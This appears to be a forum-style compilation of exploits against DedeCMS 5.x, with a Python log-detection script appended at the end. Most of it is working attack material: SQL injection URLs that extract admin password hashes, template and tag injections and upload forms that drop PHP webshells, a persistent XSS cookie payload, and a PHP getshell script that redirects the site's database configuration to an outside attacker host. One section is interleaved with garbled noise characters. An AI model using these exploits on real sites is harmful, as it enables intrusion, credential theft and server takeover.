Dedecms 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=10

DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant generates x.php with the password xiao, a one-line shell, directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 and similar block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; whichever of the URLs below is visited afterwards, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (Zhimeng) variable overwrite getshell
#!/usr/bin/env php
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if ($argv[2] == null) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp  = Getshell($url, $aid, $path);
// Getshell() returns the first response line; "OK" past offset 12 means "HTTP/1.1 200 OK"
if (strpos($exp, "OK") > 12) {
    echo "
Exploit Success \n";
    if ($aid == 1) echo "
Shell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "
Shell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "
Shell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "
Exploit Failed \n";
}

// Posts the _COOKIE[GLOBALS][cfg_db*] override fields to plus/mytag_js.php so the
// script reads its mytag rows from the attacker's database instead of the site's own
function Getshell($url, $aid, $path) {
    $id   = $aid;
    $host = $url;
    $port = "80";
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "
No response from ".$host."\n";
        return "";
    }
    fwrite($ock, $data);
    // Only the status line is needed for the success check above
    if (!feof($ock)) {
        $exp = fgets($ock, 1024);
        return $exp;
    }
    return "";
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Replace validate=dcug above with the current captcha value, and you are taken straight into the site backend.
This vulnerability requires the backend path to be known first.

Dedecms (Zhimeng) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit the form below; the shell ends up as 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the mytag_js.php URL typed into the doaction field before it is submitted
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, go into the member backend, publish an article and upload an image. Then, under attachment management, replace the image with our crafted template; for example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (prepend gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(these two fields are the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option></select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

Zhimeng (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

Zhimeng (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters cut off, giving a 20-character MD5; to get the 16-character MD5 from it, cut 3 more from the front and 1 from the end.

Zhimeng (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

Zhimeng (Dedecms) select_soft_post.php page uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action='http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php' method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞2 K, y, J9 } [' n1 u
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。/ {9 b* r2 L; t9 N, P: n) d: O
1. 访问网址:* A) A' v1 X) t2 ? ?7 R) K: C; O
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
* A, v% C4 K, {9 B5 i; d可看见错误信息
$ H7 u1 \, n ^0 S2 ?9 Y* s q
4 O9 e& N2 E, K
0 E) X6 b n# ^2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。# T8 B7 \' A ^
int(3) Error: Illegal double '1024e1024' value found during parsing
, b8 I2 w; n1 v6 QError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
8 T, O8 b5 L4 h) Z* J' f% I* ]* Y# M+ G, O. R2 x
5 f. C0 x' [0 h
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
2 V/ p, b; w" `1 u2 e0 ^
$ L1 S; b/ m! K
: j5 i. f+ x) V% Z( B<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
. X# D v& r o0 i/ S* C1 p* s2 L& d% d: y" `# n
( S& s% j0 Z% P" w* o按确定后的看到第2步骤的信息表示文件木马上传成功.; K( Y1 k5 q# j4 Q) c! u
( L- W4 i0 ?8 p
8 b* D! G) K8 U3 f. d( w& ]5 N6 z1 x, T
" C$ L& \1 n2 t0 u, u: A- Q2 Z3 K# p9 N8 ~: H A& f
T) T4 G u# |, S4 ]4 ^& ^
$ U6 L, j: B, b
1 S$ L1 ~' ?! ~( P. V- ^8 e% J+ _4 Z/ }
( s5 K. `5 e+ I: K; w6 z/ |$ z9 _7 f
Zhimeng (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
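A defender-side detection for the request patterns catalogued in this post, added here as an example that is not part of the original post: it classifies decoded request parameters by the traits the entries above share (GLOBALS/cfg_* variable overwrite, a raw sql parameter to advancedsearch.php, injection fragments, script in gotopage, ../ traversal, {dede:} tags in input) and runs the rules over constructed access-log lines. The log lines, the RFC 5737 addresses and the /member/soft_add.php path used in the checks are assumptions.

```python
"""Flag the DedeCMS request patterns catalogued above in web-server access logs.
Added example, not from the original post; sample log lines, RFC 5737 addresses
and the /member/soft_add.php path used in the checks are constructed."""
import re
from urllib.parse import parse_qsl, urlsplit

# Names that overwrite configuration when DedeCMS registers request variables:
# _COOKIE[GLOBALS][cfg_*], _POST[GLOBALS][cfg_*] and bare cfg_* keys.
GLOBALS_KEY = re.compile(r"^_(?:COOKIE|POST|GET|REQUEST|SERVER)\[GLOBALS\]|^cfg_", re.I)
# Injection fragments from the rss.php, feedback_js.php and infosearch.php requests.
SQLI = re.compile(r"\bunion\b[\s\S]*\bselect\b|updatexml\s*\(|\bselect\b[\s\S]+\bfrom\b", re.I)
XSS = re.compile(r"<script|javascript:|\bon\w+\s*=", re.I)   # login.php?gotopage=
TRAVERSAL = re.compile(r"\.\./|\.\.\\")                       # edit_face.php, carbuyaction.php
DEDE_TAG = re.compile(r"\{/?dede:", re.I)                     # {dede:...} template tags in input
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(path, params):
    """Return the set of rule names matched by one request.

    params: (name, value) pairs, already URL-decoded, from the query string,
    form body or cookies.  Names are checked as well as values because the
    rss.php payload above sits in a parameter name.
    """
    hits = set()
    script = path.rsplit("/", 1)[-1].lower()
    for name, value in params:
        if GLOBALS_KEY.search(name):
            hits.add("globals-override")
        if script == "advancedsearch.php" and name.lower() == "sql":
            hits.add("raw-sql-parameter")
        if SQLI.search(name) or SQLI.search(value):
            hits.add("sql-injection")
        if XSS.search(value):
            hits.add("xss")
        if TRAVERSAL.search(value):
            hits.add("path-traversal")
        if DEDE_TAG.search(value):
            hits.add("dede-tag-injection")
    return hits


def scan_access_log(lines):
    """Return [(client_ip, path, sorted rule names)] for lines that match a rule.

    Only the request line is visible here; POST bodies and cookies (the channel
    the mytag_js.php and login.php requests above use) must be fed to
    classify() by the application or a WAF.
    """
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        hits = classify(parts.path, parse_qsl(parts.query, keep_blank_values=True))
        if hits:
            findings.append((m.group("ip"), parts.path, sorted(hits)))
    return findings


# Constructed sample lines (RFC 5737 addresses); the view.php line is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,(SELECT%20uname%20FROM%20dede_admin),1)%23'][0]=10 HTTP/1.1" 500 0 "-" "curl/7.88"
192.0.2.9 - - [10/Oct/2023:13:57:12 +0000] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Oct/2023:13:58:40 +0000] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:59:02 +0000] "GET /plus/view.php?aid=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:14:00:15 +0000] "POST /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.99 HTTP/1.1" 200 64 "-" "curl/7.88"
"""

if __name__ == "__main__":
    for ip, path, rules in scan_access_log(SAMPLE_LOG.splitlines()):
        print(ip, path, ", ".join(rules))
```

The GLOBALS/cfg_* rule is the one to alert on hardest: it fires on the exact field names the getshell script, the backend login bypass and the select_soft_post.php form above rely on, and a legitimate client never sends them.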